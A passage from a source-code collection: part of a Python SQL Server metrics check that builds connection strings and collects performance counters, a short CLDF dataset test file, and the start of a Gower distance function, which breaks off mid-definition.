if self.connector.lower() not in self.valid_connectors:
self.log.error("Invalid database connector %s, defaulting to adodbapi", self.connector)
self.connector = 'adodbapi'
self.adoprovider = init_config.get('adoprovider', self.default_adoprovider)
if self.adoprovider.upper() not in self.valid_adoproviders:
self.log.error(
"Invalid ADODB provider string %s, defaulting to %s", self.adoprovider, self.default_adoprovider
)
self.adoprovider = self.default_adoprovider
# Pre-process the list of metrics to collect
self.custom_metrics = init_config.get('custom_metrics', [])
for instance in instances:
try:
instance_key = self._conn_key(instance, self.DEFAULT_DB_KEY)
self.do_check[instance_key] = True
# check to see if the database exists before we try any connections to it
with self.open_managed_db_connections(instance, None, db_name=self.DEFAULT_DATABASE):
db_exists, context = self._check_db_exists(instance)
if db_exists:
if instance.get('stored_procedure') is None:
with self.open_managed_db_connections(instance, self.DEFAULT_DB_KEY):
self._make_metric_list_to_collect(instance, self.custom_metrics)
else:
# How much do we care that the DB doesn't exist?
ignore = is_affirmative(instance.get("ignore_missing_database", False))
if ignore is not None and ignore:
# not much : we expect it. leave checks disabled
self.do_check[instance_key] = False
self.log.warning("Database %s does not exist. Disabling checks for this instance.", context)
else:
# yes we do. Keep trying
self.log.error("Database %s does not exist. Fix issue and restart agent", context)
except SQLConnectionError:
self.log.exception("Skipping SQL Server instance")
continue
except Exception as e:
self.log.exception("Initialization exception %s", e)
continue
def _check_db_exists(self, instance):
"""
Check if the database we're targeting actually exists
If not then we won't do any checks
This allows the same config to be installed on many servers and fail gracefully
"""
dsn, host, username, password, database, driver = self._get_access_info(instance, self.DEFAULT_DB_KEY)
context = "{} - {}".format(host, database)
if self.existing_databases is None:
cursor = self.get_cursor(instance, None, self.DEFAULT_DATABASE)
try:
self.existing_databases = {}
cursor.execute(DATABASE_EXISTS_QUERY)
for row in cursor:
self.existing_databases[row.name] = True
except Exception as e:
self.log.error("Failed to check if database %s exists: %s", database, e)
return False, context
finally:
self.close_cursor(cursor)
return database in self.existing_databases, context
def _make_metric_list_to_collect(self, instance, custom_metrics):
"""
Store the list of metrics to collect by instance_key.
Will also create and cache cursors to query the db.
"""
metrics_to_collect = []
for name, counter_name, instance_name in self.METRICS:
try:
sql_type, base_name = self.get_sql_type(instance, counter_name)
cfg = {}
cfg['name'] = name
cfg['counter_name'] = counter_name
cfg['instance_name'] = instance_name
metrics_to_collect.append(
self.typed_metric(instance, cfg, DEFAULT_PERFORMANCE_TABLE, base_name, None, sql_type, None)
)
except SQLConnectionError:
raise
except Exception:
self.log.warning("Can't load the metric %s, ignoring", name, exc_info=True)
continue
# Load any custom metrics from conf.d/sqlserver.yaml
for row in custom_metrics:
db_table = row.get('table', DEFAULT_PERFORMANCE_TABLE)
if db_table not in self.valid_tables:
self.log.error('%s has an invalid table name: %s', row['name'], db_table)
continue
if db_table == DEFAULT_PERFORMANCE_TABLE:
user_type = row.get('type')
if user_type is not None and user_type not in VALID_METRIC_TYPES:
self.log.error('%s has an invalid metric type: %s', row['name'], user_type)
sql_type = None
base_name = None  # avoid reusing a stale base counter from an earlier iteration
try:
if user_type is None:
sql_type, base_name = self.get_sql_type(instance, row['counter_name'])
except Exception:
self.log.warning("Can't load the metric %s, ignoring", row['name'], exc_info=True)
continue
metrics_to_collect.append(
self.typed_metric(instance, row, db_table, base_name, user_type, sql_type, None)
)
else:
for column in row['columns']:
metrics_to_collect.append(
self.typed_metric(instance, row, db_table, base_name, None, sql_type, column)
)
instance_key = self._conn_key(instance, self.DEFAULT_DB_KEY)
self.instances_metrics[instance_key] = metrics_to_collect
simple_metrics = []
fraction_metrics = []
wait_stat_metrics = []
vfs_metrics = []
clerk_metrics = []
self.log.debug("metrics to collect %s", metrics_to_collect)
for m in metrics_to_collect:
if type(m) is SqlSimpleMetric:
self.log.debug("Adding simple metric %s", m.sql_name)
simple_metrics.append(m.sql_name)
elif type(m) is SqlFractionMetric or type(m) is SqlIncrFractionMetric:
self.log.debug("Adding fraction metric %s", m.sql_name)
fraction_metrics.append(m.sql_name)
fraction_metrics.append(m.base_name)
elif type(m) is SqlOsWaitStat:
self.log.debug("Adding SqlOsWaitStat metric %s", m.sql_name)
wait_stat_metrics.append(m.sql_name)
elif type(m) is SqlIoVirtualFileStat:
self.log.debug("Adding SqlIoVirtualFileStat metric %s", m.sql_name)
vfs_metrics.append(m.sql_name)
elif type(m) is SqlOsMemoryClerksStat:
self.log.debug("Adding SqlOsMemoryClerksStat metric %s", m.sql_name)
clerk_metrics.append(m.sql_name)
self.instances_per_type_metrics[instance_key]["SqlSimpleMetric"] = simple_metrics
self.instances_per_type_metrics[instance_key]["SqlFractionMetric"] = fraction_metrics
self.instances_per_type_metrics[instance_key]["SqlOsWaitStat"] = wait_stat_metrics
self.instances_per_type_metrics[instance_key]["SqlIoVirtualFileStat"] = vfs_metrics
self.instances_per_type_metrics[instance_key]["SqlOsMemoryClerksStat"] = clerk_metrics
def typed_metric(self, instance, cfg_inst, table, base_name, user_type, sql_type, column):
'''
Create the appropriate SqlServerMetric object, each implementing its method to
fetch the metrics properly.
If a `type` was specified in the config, it is used to report the value
directly fetched from SQLServer. Otherwise, it is decided based on the
sql_type, according to microsoft's documentation.
'''
if table == DEFAULT_PERFORMANCE_TABLE:
metric_type_mapping = {
PERF_COUNTER_BULK_COUNT: (self.rate, SqlSimpleMetric),
PERF_COUNTER_LARGE_RAWCOUNT: (self.gauge, SqlSimpleMetric),
PERF_LARGE_RAW_BASE: (self.gauge, SqlSimpleMetric),
PERF_RAW_LARGE_FRACTION: (self.gauge, SqlFractionMetric),
PERF_AVERAGE_BULK: (self.gauge, SqlIncrFractionMetric),
}
if user_type is not None:
# user type overrides any other value
metric_type = getattr(self, user_type)
cls = SqlSimpleMetric
else:
metric_type, cls = metric_type_mapping[sql_type]
else:
table_type_mapping = {
DM_OS_WAIT_STATS_TABLE: (self.gauge, SqlOsWaitStat),
DM_OS_MEMORY_CLERKS_TABLE: (self.gauge, SqlOsMemoryClerksStat),
DM_OS_VIRTUAL_FILE_STATS: (self.gauge, SqlIoVirtualFileStat),
}
metric_type, cls = table_type_mapping[table]
return cls(self._get_connector(instance), cfg_inst, base_name, metric_type, column, self.log)
def _get_connector(self, instance):
connector = instance.get('connector', self.connector)
if connector != self.connector:
if connector.lower() not in self.valid_connectors:
self.log.warning("Invalid database connector %s using default %s", connector, self.connector)
connector = self.connector
else:
self.log.debug("Overriding default connector for %s with %s", instance['host'], connector)
return connector
def _get_adoprovider(self, instance):
provider = instance.get('adoprovider', self.default_adoprovider)
if provider != self.adoprovider:
if provider.upper() not in self.valid_adoproviders:
self.log.warning("Invalid ADO provider %s using default %s", provider, self.adoprovider)
provider = self.adoprovider
else:
self.log.debug("Overriding default ADO provider for %s with %s", instance['host'], provider)
return provider
def _get_access_info(self, instance, db_key, db_name=None):
''' Convenience method to extract info from instance
'''
dsn = instance.get('dsn')
host = instance.get('host')
username = instance.get('username')
password = instance.get('password')
database = instance.get(db_key) if db_name is None else db_name
driver = instance.get('driver')
if not dsn:
if not host:
host = '127.0.0.1,1433'
if not database:
database = self.DEFAULT_DATABASE
if not driver:
driver = self.DEFAULT_DRIVER
return dsn, host, username, password, database, driver
def _conn_key(self, instance, db_key, db_name=None):
''' Return a key to use for the connection cache
'''
dsn, host, username, password, database, driver = self._get_access_info(instance, db_key, db_name)
return '{}:{}:{}:{}:{}:{}'.format(dsn, host, username, password, database, driver)
def _conn_string_odbc(self, db_key, instance=None, conn_key=None, db_name=None):
''' Return a connection string to use with odbc
'''
if instance:
dsn, host, username, password, database, driver = self._get_access_info(instance, db_key, db_name)
elif conn_key:
dsn, host, username, password, database, driver = conn_key.split(":")
conn_str = ''
if dsn:
conn_str = 'DSN={};'.format(dsn)
if driver:
conn_str += 'DRIVER={};'.format(driver)
if host:
conn_str += 'Server={};'.format(host)
if database:
conn_str += 'Database={};'.format(database)
if username:
conn_str += 'UID={};'.format(username)
self.log.debug("Connection string (before password) %s", conn_str)
if password:
conn_str += 'PWD={};'.format(password)
return conn_str
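    # Worked example of the builder above (illustrative values, not real credentials):
    # driver='SQL Server', host='127.0.0.1,1433', database='master',
    # username='datadog', password='secret' yields
    # 'DRIVER=SQL Server;Server=127.0.0.1,1433;Database=master;UID=datadog;PWD=secret;'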
def _conn_string_adodbapi(self, db_key, instance=None, conn_key=None, db_name=None):
''' Return a connection string to use with adodbapi
'''
if instance:
_, host, username, password, database, _ = self._get_access_info(instance, db_key, db_name)
elif conn_key:
_, host, username, password, database, _ = conn_key.split(":")
provider = self._get_adoprovider(instance)
conn_str = 'Provider={};Data Source={};Initial Catalog={};'.format(provider, host, database)
if username:
conn_str += 'User ID={};'.format(username)
if password:
conn_str += 'Password={};'.format(password)
if not username and not password:
conn_str += 'Integrated Security=SSPI;'
return conn_str
@contextmanager
def get_managed_cursor(self, instance, db_key, db_name=None):
cursor = self.get_cursor(instance, db_key, db_name)
yield cursor
self.close_cursor(cursor)
def get_cursor(self, instance, db_key, db_name=None):
'''
Return a cursor to execute query against the db
Cursors are cached in the self.connections dict
'''
conn_key = self._conn_key(instance, db_key, db_name)
try:
conn = self.connections[conn_key]['conn']
except KeyError:
# We catch KeyError to avoid leaking the auth info used to compose the key
# FIXME: we should find a better way to compute unique keys to map opened connections other than
# using auth info in clear text!
raise SQLConnectionError("Cannot find an opened connection for host: {}".format(instance.get('host')))
return conn.cursor()
def get_sql_type(self, instance, counter_name):
'''
Return the type of the performance counter so that we can report it to
Datadog correctly
If the sql_type is one that needs a base (PERF_RAW_LARGE_FRACTION and
PERF_AVERAGE_BULK), the name of the base counter will also be returned
'''
with self.get_managed_cursor(instance, self.DEFAULT_DB_KEY) as cursor:
cursor.execute(COUNTER_TYPE_QUERY, (counter_name,))
(sql_type,) = cursor.fetchone()
if sql_type == PERF_LARGE_RAW_BASE:
self.log.warning("Metric %s is of type Base and shouldn't be reported this way", counter_name)
base_name = None
if sql_type in [PERF_AVERAGE_BULK, PERF_RAW_LARGE_FRACTION]:
# This is an ugly hack. For certain types of metric (PERF_RAW_LARGE_FRACTION
# and PERF_AVERAGE_BULK), we need two metrics: the metrics specified and
# a base metrics to get the ratio. There is no unique schema so we generate
# the possible candidates and we look at which ones exist in the db.
candidates = (
counter_name + " base",
counter_name.replace("(ms)", "base"),
counter_name.replace("Avg ", "") + " base",
)
try:
cursor.execute(BASE_NAME_QUERY, candidates)
base_name = cursor.fetchone().counter_name.strip()
self.log.debug("Got base metric: %s for metric: %s", base_name, counter_name)
except Exception as e:
self.log.warning("Could not get counter_name of base for metric: %s", e)
return sql_type, base_name
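    # Example of the pairing above, using a standard counter from
    # sys.dm_os_performance_counters: 'Buffer cache hit ratio'
    # (PERF_RAW_LARGE_FRACTION) is reported against 'Buffer cache hit ratio base',
    # which is exactly the counter_name + " base" candidate generated above.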
def check(self, instance):
if self.do_check[self._conn_key(instance, self.DEFAULT_DB_KEY)]:
proc = instance.get('stored_procedure')
if proc is None:
self.do_perf_counter_check(instance)
else:
self.do_stored_procedure_check(instance, proc)
else:
self.log.debug("Skipping check")
def do_perf_counter_check(self, instance):
"""
Fetch the metrics from the sys.dm_os_performance_counters table
"""
custom_tags = instance.get('tags', [])
if custom_tags is None:
custom_tags = []
instance_key = self._conn_key(instance, self.DEFAULT_DB_KEY)
instance_by_key = self.instances_per_type_metrics[instance_key]
with self.open_managed_db_connections(instance, self.DEFAULT_DB_KEY):
# if the server was down at check __init__ key could be missing.
if instance_key not in self.instances_metrics:
self._make_metric_list_to_collect(instance, self.custom_metrics)
metrics_to_collect = self.instances_metrics[instance_key]
with self.get_managed_cursor(instance, self.DEFAULT_DB_KEY) as cursor:
simple_rows = SqlSimpleMetric.fetch_all_values(cursor, instance_by_key["SqlSimpleMetric"], self.log)
fraction_results = SqlFractionMetric.fetch_all_values(
cursor, instance_by_key["SqlFractionMetric"], self.log
)
waitstat_rows, waitstat_cols = SqlOsWaitStat.fetch_all_values(
cursor, instance_by_key["SqlOsWaitStat"], self.log
)
vfs_rows, vfs_cols = SqlIoVirtualFileStat.fetch_all_values(
cursor, instance_by_key["SqlIoVirtualFileStat"], self.log
)
clerk_rows, clerk_cols = SqlOsMemoryClerksStat.fetch_all_values(
cursor, instance_by_key["SqlOsMemoryClerksStat"], self.log # noqa: E501
)
for metric in metrics_to_collect:
try:
if type(metric) is SqlSimpleMetric:
metric.fetch_metric(cursor, simple_rows, custom_tags)
elif type(metric) is SqlFractionMetric or type(metric) is SqlIncrFractionMetric:
metric.fetch_metric(cursor, fraction_results, custom_tags)
elif type(metric) is SqlOsWaitStat:
metric.fetch_metric(cursor, waitstat_rows, waitstat_cols, custom_tags)
elif type(metric) is SqlIoVirtualFileStat:
metric.fetch_metric(cursor, vfs_rows, vfs_cols, custom_tags)
elif type(metric) is SqlOsMemoryClerksStat:
metric.fetch_metric(cursor, clerk_rows, clerk_cols, custom_tags)
except Exception as e:
self.log.warning("Could not fetch metric %s : %s", metric.datadog_name, e)
def do_stored_procedure_check(self, instance, proc):
"""
Fetch the metrics from the stored proc
"""
guardSql = instance.get('proc_only_if')
custom_tags = instance.get("tags", [])
if (guardSql and self.proc_check_guard(instance, guardSql)) or not guardSql:
self.open_db_connections(instance, self.DEFAULT_DB_KEY)
cursor = self.get_cursor(instance, self.DEFAULT_DB_KEY)
try:
self.log.debug("Calling Stored Procedure : %s", proc)
if self._get_connector(instance) == 'adodbapi':
cursor.callproc(proc)
else:
# pyodbc does not support callproc; use execute instead.
# Reference: https://github.com/mkleehammer/pyodbc/wiki/Calling-Stored-Procedures
call_proc = '{{CALL {}}}'.format(proc)
cursor.execute(call_proc)
rows = cursor.fetchall()
self.log.debug("Row count (%s) : %s", proc, cursor.rowcount)
for row in rows:
tags = [] if row.tags is None or row.tags == '' else row.tags.split(',')
tags.extend(custom_tags)
if row.type.lower() in self.proc_type_mapping:
self.proc_type_mapping[row.type](row.metric, row.value, tags)
else:
self.log.warning(
'%s is not a recognised type from procedure %s, metric %s', row.type, proc, row.metric
)
except Exception as e:
self.log.warning("Could not call procedure %s: %s", proc, e)
self.close_cursor(cursor)
self.close_db_connections(instance, self.DEFAULT_DB_KEY)
else:
self.log.info("Skipping call to %s due to only_if", proc)
def proc_check_guard(self, instance, sql):
"""
Check whether the guard SQL returns a single column containing 0 or 1.
We return True if it is 1, else False.
"""
self.open_db_connections(instance, self.PROC_GUARD_DB_KEY)
cursor = self.get_cursor(instance, self.PROC_GUARD_DB_KEY)
should_run = False
try:
cursor.execute(sql, ())
result = cursor.fetchone()
should_run = result[0] == 1
except Exception as e:
self.log.error("Failed to run proc_only_if sql %s : %s", sql, e)
self.close_cursor(cursor)
self.close_db_connections(instance, self.PROC_GUARD_DB_KEY)
return should_run
def close_cursor(self, cursor):
"""
We close the cursor explicitly b/c we had proven memory leaks
We handle any exception from closing, although according to the doc:
"in adodbapi, it is NOT an error to re-close a closed cursor"
"""
try:
cursor.close()
except Exception as e:
self.log.warning("Could not close adodbapi cursor\n%s", e)
def close_db_connections(self, instance, db_key, db_name=None):
"""
We close the db connections explicitly b/c when we don't they keep
locks on the db. This presents as issues such as the SQL Server Agent
being unable to stop.
"""
conn_key = self._conn_key(instance, db_key, db_name)
if conn_key not in self.connections:
return
try:
self.connections[conn_key]['conn'].close()
del self.connections[conn_key]
except Exception as e:
self.log.warning("Could not close adodbapi db connection\n%s", e)
@contextmanager
def open_managed_db_connections(self, instance, db_key, db_name=None):
self.open_db_connections(instance, db_key, db_name)
yield
self.close_db_connections(instance, db_key, db_name)
def open_db_connections(self, instance, db_key, db_name=None):
"""
We open the db connections explicitly, so we can ensure they are open
before we use them, and are closable, once we are finished. Open db
connections keep locks on the db, presenting issues such as the SQL
Server Agent being unable to stop.
"""
conn_key = self._conn_key(instance, db_key, db_name)
timeout = int(instance.get('command_timeout', self.DEFAULT_COMMAND_TIMEOUT))
dsn, host, username, password, database, driver = self._get_access_info(instance, db_key, db_name)
custom_tags = instance.get("tags", [])
if custom_tags is None:
custom_tags = []
service_check_tags = ['host:{}'.format(host), 'db:{}'.format(database)]
service_check_tags.extend(custom_tags)
service_check_tags = list(set(service_check_tags))
cs = instance.get('connection_string', '')
cs += ';' if cs != '' else ''
try:
if self._get_connector(instance) == 'adodbapi':
cs += self._conn_string_adodbapi(db_key, instance=instance, db_name=db_name)
# autocommit: true disables implicit transaction
rawconn = adodbapi.connect(cs, {'timeout': timeout, 'autocommit': True})
else:
cs += self._conn_string_odbc(db_key, instance=instance, db_name=db_name)
rawconn = pyodbc.connect(cs, timeout=timeout)
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.OK, tags=service_check_tags)
if conn_key not in self.connections:
self.connections[conn_key] = {'conn': rawconn, 'timeout': timeout}
else:
try:
# explicitly trying to avoid leaks...
self.connections[conn_key]['conn'].close()
except Exception as e:
self.log.info("Could not close adodbapi db connection\n%s", e)
self.connections[conn_key]['conn'] = rawconn
except Exception as e:
cx = "{} - {}".format(host, database)
message = "Unable to connect to SQL Server for instance {}: {}".format(cx, repr(e))
password = instance.get('password')
if password is not None:
message = message.replace(password, "*" * 6)
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL, tags=service_check_tags, message=message)
raise_from(SQLConnectionError(message), None)
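    # Editor's note: an illustrative ODBC connection string of the general shape assembled
    # above (hypothetical values; the exact keys come from _conn_string_odbc and the
    # configured driver):
    #   DRIVER={ODBC Driver 17 for SQL Server};Server=myhost,1433;Database=master;UID=datadog;PWD=***;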
class SqlServerMetric(object):
'''General class for common methods, should never be instantiated directly
'''
def __init__(self, connector, cfg_instance, base_name, report_function, column, logger):
self.connector = connector
self.cfg_instance = cfg_instance
self.datadog_name = cfg_instance['name']
self.sql_name = cfg_instance.get('counter_name', '')
self.base_name = base_name
self.report_function = report_function
self.instance = cfg_instance.get('instance_name', '')
self.object_name = cfg_instance.get('object_name', '')
self.tags = cfg_instance.get('tags', [])
self.tag_by = cfg_instance.get('tag_by', None)
self.column = column
self.instances = None
self.past_values = {}
self.log = logger
def fetch_metrics(self, cursor, tags):
raise NotImplementedError
class SqlSimpleMetric(SqlServerMetric):
@classmethod
def fetch_all_values(cls, cursor, counters_list, logger):
placeholder = '?'
placeholders = ', '.join(placeholder for unused in counters_list)
query_base = (
'''
select counter_name, instance_name, object_name, cntr_value
from sys.dm_os_performance_counters where counter_name in (%s)
'''
% placeholders
)
logger.debug("query base: %s", query_base)
cursor.execute(query_base, counters_list)
rows = cursor.fetchall()
return rows
def fetch_metric(self, cursor, rows, tags):
tags = tags + self.tags
for counter_name_long, instance_name_long, object_name, cntr_value in rows:
counter_name = counter_name_long.strip()
instance_name = instance_name_long.strip()
object_name = object_name.strip()
if counter_name.strip() == self.sql_name:
matched = False
metric_tags = list(tags)
if (self.instance == ALL_INSTANCES and instance_name != "_Total") or (
instance_name == self.instance and (not self.object_name or object_name == self.object_name)
):
matched = True
if matched:
if self.instance == ALL_INSTANCES:
metric_tags.append('{}:{}'.format(self.tag_by, instance_name.strip()))
self.report_function(self.datadog_name, cntr_value, tags=metric_tags)
if self.instance != ALL_INSTANCES:
break
class SqlFractionMetric(SqlServerMetric):
@classmethod
def fetch_all_values(cls, cursor, counters_list, logger):
placeholder = '?'
placeholders = ', '.join(placeholder for unused in counters_list)
query_base = VALUE_AND_BASE_QUERY % placeholders
logger.debug("query base: %s, %s", query_base, str(counters_list))
cursor.execute(query_base, counters_list)
rows = cursor.fetchall()
results = defaultdict(list)
for counter_name, cntr_type, cntr_value, instance_name, object_name in rows:
rowlist = [cntr_type, cntr_value, instance_name.strip(), object_name.strip()]
logger.debug("Adding new rowlist %s", str(rowlist))
results[counter_name.strip()].append(rowlist)
return results
def set_instances(self, cursor):
if self.instance == ALL_INSTANCES:
cursor.execute(INSTANCES_QUERY, (self.sql_name,))
self.instances = [row.instance_name for row in cursor.fetchall()]
else:
self.instances = [self.instance]
def fetch_metric(self, cursor, results, tags):
'''
        Because these metrics come in value/base pairs, we cannot report them in a single
        pass without matching rows by name afterwards, so instead we process them instance
        by instance. The list of instances is cached so we don't look it up every time.
'''
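        # Each instance contributes two rows with the same instance_name: the row whose
        # cntr_type is smaller is treated as the value and the other as the base (see the
        # ctype < ctype2 comparison below); report_fraction() then divides the two.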
if self.sql_name not in results:
self.log.warning("Couldn't find %s in results", self.sql_name)
return
tags = tags + self.tags
results_list = results[self.sql_name]
done_instances = []
for ndx, row in enumerate(results_list):
ctype = row[0]
cval = row[1]
inst = row[2]
object_name = row[3]
if inst in done_instances:
continue
if (self.instance != ALL_INSTANCES and inst != self.instance) or (
self.object_name and object_name != self.object_name
):
done_instances.append(inst)
continue
# find the next row which has the same instance
cval2 = None
ctype2 = None
            for second_row in results_list[ndx + 1:]:
if inst == second_row[2]:
cval2 = second_row[1]
ctype2 = second_row[0]
if cval2 is None:
self.log.warning("Couldn't find second value for %s", self.sql_name)
continue
done_instances.append(inst)
if ctype < ctype2:
value = cval
base = cval2
else:
value = cval2
base = cval
metric_tags = list(tags)
if self.instance == ALL_INSTANCES:
metric_tags.append('{}:{}'.format(self.tag_by, inst.strip()))
self.report_fraction(value, base, metric_tags)
def report_fraction(self, value, base, metric_tags):
try:
result = value / float(base)
self.report_function(self.datadog_name, result, tags=metric_tags)
except ZeroDivisionError:
self.log.debug("Base value is 0, won't report metric %s for tags %s", self.datadog_name, metric_tags)
class SqlIncrFractionMetric(SqlFractionMetric):
def report_fraction(self, value, base, metric_tags):
key = "key:" + "".join(metric_tags)
if key in self.past_values:
old_value, old_base = self.past_values[key]
diff_value = value - old_value
diff_base = base - old_base
try:
result = diff_value / float(diff_base)
self.report_function(self.datadog_name, result, tags=metric_tags)
except ZeroDivisionError:
self.log.debug("Base value is 0, won't report metric %s for tags %s", self.datadog_name, metric_tags)
self.past_values[key] = (value, base)
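        # Worked example (editor's note): with a previous sample of (value=50, base=200)
        # and a current sample of (value=80, base=240), the reported ratio is
        # (80 - 50) / float(240 - 200) = 0.75, i.e. the fraction over the collection
        # interval rather than the lifetime ratio reported by SqlFractionMetric.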
class SqlOsWaitStat(SqlServerMetric):
@classmethod
def fetch_all_values(cls, cursor, counters_list, logger):
if not counters_list:
return None, None
placeholder = '?'
placeholders = ', '.join(placeholder for unused in counters_list)
query_base = '''
select * from sys.dm_os_wait_stats where wait_type in ({})
'''.format(
placeholders
)
cursor.execute(query_base, counters_list)
rows = cursor.fetchall()
columns = [i[0] for i in cursor.description]
return rows, columns
def fetch_metric(self, cursor, rows, columns, tags):
name_column_index = columns.index("wait_type")
value_column_index = columns.index(self.column)
value = None
for row in rows:
if row[name_column_index] == self.sql_name:
value = row[value_column_index]
break
if value is None:
self.log.debug("Didn't find %s %s", self.sql_name, self.column)
return
self.log.debug("Value for %s %s is %s", self.sql_name, self.column, value)
metric_name = '{}.{}'.format(self.datadog_name, self.column)
self.report_function(metric_name, value, tags=tags + self.tags)
class SqlIoVirtualFileStat(SqlServerMetric):
@classmethod
def fetch_all_values(cls, cursor, counters_list, logger):
if not counters_list:
return None, None
query_base = "select * from sys.dm_io_virtual_file_stats(null, null)"
cursor.execute(query_base)
rows = cursor.fetchall()
columns = [i[0] for i in cursor.description]
return rows, columns
def __init__(self, connector, cfg_instance, base_name, report_function, column, logger):
super(SqlIoVirtualFileStat, self).__init__(connector, cfg_instance, base_name, report_function, column, logger)
self.dbid = self.cfg_instance.get('database_id', None)
self.fid = self.cfg_instance.get('file_id', None)
self.pvs_vals = defaultdict(lambda: None)
def fetch_metric(self, cursor, rows, columns, tags):
tags = tags + self.tags
dbid_ndx = columns.index("database_id")
fileid_ndx = columns.index("file_id")
column_ndx = columns.index(self.column)
for row in rows:
dbid = row[dbid_ndx]
fid = row[fileid_ndx]
value = row[column_ndx]
if self.dbid and self.dbid != dbid:
continue
if self.fid and self.fid != fid:
continue
if not self.pvs_vals[dbid, fid]:
self.pvs_vals[dbid, fid] = value
continue
report_value = value - self.pvs_vals[dbid, fid]
self.pvs_vals[dbid, fid] = value
metric_tags = ['database_id:{}'.format(str(dbid).strip()), 'file_id:{}'.format(str(fid).strip())]
metric_tags.extend(tags)
metric_name = '{}.{}'.format(self.datadog_name, self.column)
self.report_function(metric_name, report_value, tags=metric_tags)
class SqlOsMemoryClerksStat(SqlServerMetric):
@classmethod
def fetch_all_values(cls, cursor, counters_list, logger):
if not counters_list:
return None, None
placeholder = '?'
placeholders = ', '.join(placeholder for _ in counters_list)
query_base = '''
select * from sys.dm_os_memory_clerks where type in ({})
'''.format(
placeholders
)
cursor.execute(query_base, counters_list)
rows = cursor.fetchall()
columns = [i[0] for i in cursor.description]
return rows, columns
def fetch_metric(self, cursor, rows, columns, tags):
tags = tags + self.tags
type_column_index = columns.index("type")
value_column_index = columns.index(self.column)
memnode_index = columns.index("memory_node_id")
for row in rows:
column_val = row[value_column_index]
node_id = row[memnode_index]
met_type = row[type_column_index]
if met_type != self.sql_name:
continue
metric_tags = ['memory_node_id:{}'.format(str(node_id))]
metric_tags.extend(tags)
metric_name = '{}.{}'.format(self.datadog_name, self.column)
self.report_function(metric_name, column_val, tags=metric_tags)
avg_line_length: 42.971787 | max_line_length: 136 | alphanum_fraction: 0.612246

hexsha: 962ab1d213ce1ba006b0e224497bb9c4b3c11da7 | size: 450 | ext: py | lang: Python
max_stars_repo: test.py | lexibank/huntergatherer | 50c03c198535cfcc145a605edf3307f90639e23c | ["CC-BY-4.0"] | stars: null | null | null
max_issues_repo: test.py | lexibank/huntergatherer | 50c03c198535cfcc145a605edf3307f90639e23c | ["CC-BY-4.0"] | issues: 8 | 2019-04-08T20:39:40.000Z | 2021-07-23T09:34:18.000Z
max_forks_repo: test.py | lexibank/huntergatherer | 50c03c198535cfcc145a605edf3307f90639e23c | ["CC-BY-4.0"] | forks: null | null | null
def test_valid(cldf_dataset, cldf_logger):
assert cldf_dataset.validate(log=cldf_logger)
def test_forms(cldf_dataset):
assert len(list(cldf_dataset["FormTable"])) == 79893
assert any(f["Form"] == "panyi'a-t" for f in cldf_dataset["FormTable"])
def test_parameters(cldf_dataset):
assert len(list(cldf_dataset["ParameterTable"])) == 744
def test_languages(cldf_dataset):
assert len(list(cldf_dataset["LanguageTable"])) == 324
avg_line_length: 28.125 | max_line_length: 75 | alphanum_fraction: 0.733333

hexsha: 265669498cc7781f8741865813c0252cc00bf905 | size: 4,661 | ext: py | lang: Python
max_stars_repo: gower/gower_dist.py | singharx/gower | a5826342ed00bc981d7cef8604f7edfcad92f3ab | ["MIT"] | stars: 42 | 2020-04-07T16:38:37.000Z | 2022-03-11T16:52:16.000Z
max_issues_repo: gower/gower_dist.py | singharx/gower | a5826342ed00bc981d7cef8604f7edfcad92f3ab | ["MIT"] | issues: 4 | 2020-08-30T19:20:13.000Z | 2022-03-21T09:47:00.000Z
max_forks_repo: gower/gower_dist.py | singharx/gower | a5826342ed00bc981d7cef8604f7edfcad92f3ab | ["MIT"] | forks: 10 | 2020-05-02T14:11:34.000Z | 2022-03-20T22:22:17.000Z
from scipy.sparse import issparse
import numpy as np
import pandas as pd
def gower_matrix(data_x, data_y=None, weight=None, cat_features=None):
# function checks
X = data_x
if data_y is None: Y = data_x
else: Y = data_y
if not isinstance(X, np.ndarray):
if not np.array_equal(X.columns, Y.columns): raise TypeError("X and Y must have same columns!")
else:
if not X.shape[1] == Y.shape[1]: raise TypeError("X and Y must have same y-dim!")
if issparse(X) or issparse(Y): raise TypeError("Sparse matrices are not supported!")
x_n_rows, x_n_cols = X.shape
y_n_rows, y_n_cols = Y.shape
if cat_features is None:
if not isinstance(X, np.ndarray):
            is_categorical = np.vectorize(lambda x: not np.issubdtype(x, np.number))
            cat_features = is_categorical(X.dtypes)
else:
cat_features = np.zeros(x_n_cols, dtype=bool)
for col in range(x_n_cols):
if not np.issubdtype(type(X[0, col]), np.number):
cat_features[col]=True
else:
cat_features = np.array(cat_features)
# print(cat_features)
if not isinstance(X, np.ndarray): X = np.asarray(X)
if not isinstance(Y, np.ndarray): Y = np.asarray(Y)
Z = np.concatenate((X,Y))
x_index = range(0,x_n_rows)
y_index = range(x_n_rows,x_n_rows+y_n_rows)
Z_num = Z[:,np.logical_not(cat_features)]
num_cols = Z_num.shape[1]
num_ranges = np.zeros(num_cols)
num_max = np.zeros(num_cols)
for col in range(num_cols):
col_array = Z_num[:, col].astype(np.float32)
        col_max = np.nanmax(col_array)
        col_min = np.nanmin(col_array)
        if np.isnan(col_max):
            col_max = 0.0
        if np.isnan(col_min):
            col_min = 0.0
        num_max[col] = col_max
        num_ranges[col] = (1 - col_min / col_max) if (col_max != 0) else 0.0
# This is to normalize the numeric values between 0 and 1.
Z_num = np.divide(Z_num ,num_max,out=np.zeros_like(Z_num), where=num_max!=0)
Z_cat = Z[:,cat_features]
if weight is None:
weight = np.ones(Z.shape[1])
#print(weight)
weight_cat=weight[cat_features]
weight_num=weight[np.logical_not(cat_features)]
out = np.zeros((x_n_rows, y_n_rows), dtype=np.float32)
weight_sum = weight.sum()
X_cat = Z_cat[x_index,]
X_num = Z_num[x_index,]
Y_cat = Z_cat[y_index,]
Y_num = Z_num[y_index,]
# print(X_cat,X_num,Y_cat,Y_num)
for i in range(x_n_rows):
j_start= i
if x_n_rows != y_n_rows:
j_start = 0
# call the main function
res = gower_get(X_cat[i,:],
X_num[i,:],
Y_cat[j_start:y_n_rows,:],
Y_num[j_start:y_n_rows,:],
weight_cat,
weight_num,
weight_sum,
cat_features,
num_ranges,
num_max)
#print(res)
out[i,j_start:]=res
if x_n_rows == y_n_rows: out[i:,j_start]=res
return out
def gower_get(xi_cat,xi_num,xj_cat,xj_num,feature_weight_cat,
feature_weight_num,feature_weight_sum,categorical_features,
ranges_of_numeric,max_of_numeric ):
# categorical columns
